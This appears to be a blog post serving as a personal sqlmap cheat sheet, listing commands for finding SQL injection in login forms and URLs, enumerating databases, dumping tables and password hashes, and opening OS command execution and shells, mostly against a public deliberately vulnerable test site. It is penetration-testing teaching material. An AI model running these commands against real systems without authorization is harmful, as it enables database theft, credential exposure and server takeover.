SQLmap cheat sheet

Md. Mahim Bin Firoj
5 min readDec 9, 2024

--

Image credit: Vaadata

Disclaimer: Before using the sqlmap tool, you must have proper permission to play with the database. Hacking is illegal. The author will not be held responsible in case of any misuse of the tool.

SQLmap command usage:

SQLmap comes by default with kali. Update it before usage.
https://www.stationx.net/sqlmap-cheat-sheet/ →>> You can generate sql command from this link. There is a tool called sql command generator.

I have made this for my usage convenient. You can take reference from here and make your own :)

Let’s start:

sqlmap -h (for help)

Some common command options:

-u or - url which is the target url to test the vulnerability.
-p for parameter for example username or password field. You can use burp or owasp zap to test what field carry username and password value.
--data is to check POST data for example id=1 etc.
-o for quickly export result to a file.
--tor options lets you to stay anonymous while scanning.
--wizard is for beginner. It will give you interactive guideline for the usage.
-d to get database names, table and column names.
-D for specific database name.
-T for specific table name.
--level (value 1-5) and --risk (value 1-3) this will tell sqlmap how aggressively the tool can interact with the server or target url.
--tamper to bypass WAF/IPS/Firewall.
--method is for GET, POST etc.
--save allows you to save the current session.
--resume allows you to resume from the previous session.
--dbs for database finger printing.
--dump or - dump-all to dump all the juicy data.
--dbms=mysql or other db name.

Testing sql in a login page:

If the parameter is send via GET request.

sqlmap -u https://example.com/login.php username=admin&password=admin123 --method GET --dbs

If the parameter is send via POST request.

sqlmap -u "https://example.com/login.php" --method POST --data "username=admin&password=admin123" --dbs

You can use quotes or not, it will work.

If you saved the request in a text file using burp, meaning you provide username and password and hit login, before that intercept the request using burp, then save that in a text file like here request.txt:

sqlmap -r request.txt --dbs
or
sqlmap -r request.txt --ignore-code 401

(you will be asked so many questions, just answer it based on your instinct or follow what it suggest, i.e Y/n means if you enter it will take as Yes. y/N it will take as no)
It looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Select Yes if you sure that db is MySQL. If you want to test all db with payloads then select No.
For the remaining tests do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Select Y if you want more extensive test. Select No if you want to go with normal test.
Do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] Select No here. This is actually vary. Test with Y in another try.
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n (Your wish).

Now all the question you have answered. If you want to automate this then use --batch options.

sqlmap -r request.txt — ignore-code 401 --batch
It will take more time to complete.

Now you will be told about vulnerabilities with payload if found.

To find out database name and their tables:

sqlmap -r request.txt --ignore-code 401 --tables

It will first fetch the db names then tables of each db. After fetching all db name you can stop so that you can only query to your required db tables.
Say you got the db name as korp_terminal

sqlmap -r request.txt --ignore-code 401 -D korp_terminal --tables

Say you find a table called users.

sqlmap -r request.txt --ignore-code 401 -D korp_terminal -T users --dump

You will get column name everything here now after dumping.

To dump everything plus shell access:

sqlmap -r request.txt --ignore-code 401 --dump-all --os-shell

Determining Users & Passwords With SQLmap:

sqlmap -r request.txt --ignore-code 401 --users

sqlmap -r request.txt --ignore-code 401 --passwords

Sometimes you may see that when you stop a running command by pressing ctrl+c and re-run the command, then it will resume from the last session where it was stopped. If you don’t want that then you can use below command for example.

sqlmap -r request.txt --passwords --flush-session

If vulnerability lies in the product category or url:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
sqlmap -u https://example.com/news/hello-how-are-you --batch
sqlmap --help
sqlmap -u https://example.com/news/hello-how-are-you --batch --risk=3
sqlmap -u https://example.com/news/hello-how-are-you --batch --level=5

You will get db name, version, underlying os and schema info by using the above command. After running the above command we get acuart which is the db name. Now we want to see all the tables of that db, so we use the below command.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

Now we will get table names. So use below command to fetch data from that table. We get artists as table. Now if we want to find columns of artists table then we need to run below command.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T artists --dump

Now we will get columns name of artists table. We get aname as column of artists table. Now we can also dump specific columns of that particular table.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T artists -C aname --dump

This is how we can dump finally column data as well which is under artists table.

Determining Users & Passwords With SQLmap:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --users

The users is the table here.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --passwords

Reveal password hash of the usernames.

Command Injection With SQLmap:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --os-cmd="uname -a"

Opening a Shell With SQLmap: (Sometimes it works, sometimes not)

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --os-shell

It will ask you server platform like php, asp etc. After answering that now it will ask you, do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
If nothing found type /tmp after selecting option 2.

Relevant commands:

For example, if your burpsuite is installed in one vm and your kali is installed in another vm, then you may need to move the request.txt file (which contains intercepted login request) to the kali vm. Scp command help in that case.

scp /home/kali/request.txt kali@192.168.1.100:/home/kali/

It will ask for password of the destination machine user.

If you see that you are unable to access the kali vm, it might be your ssh service is not running. Use below commands to solve that.

systemctl start ssh (In dest machine)
systemctl enable ssh (In dest machine)

Thanks. I hope this will help you a lot. Kindly consider subscribe.

Special thanks to Stationx and Motassem Hamdan.

LinkedIn:

https://www.linkedin.com/in/md-mahimbin-firoj-7b8a5a113/

YouTube:

https://www.youtube.com/@mahimfiroj1802/videos

--

--

No responses yet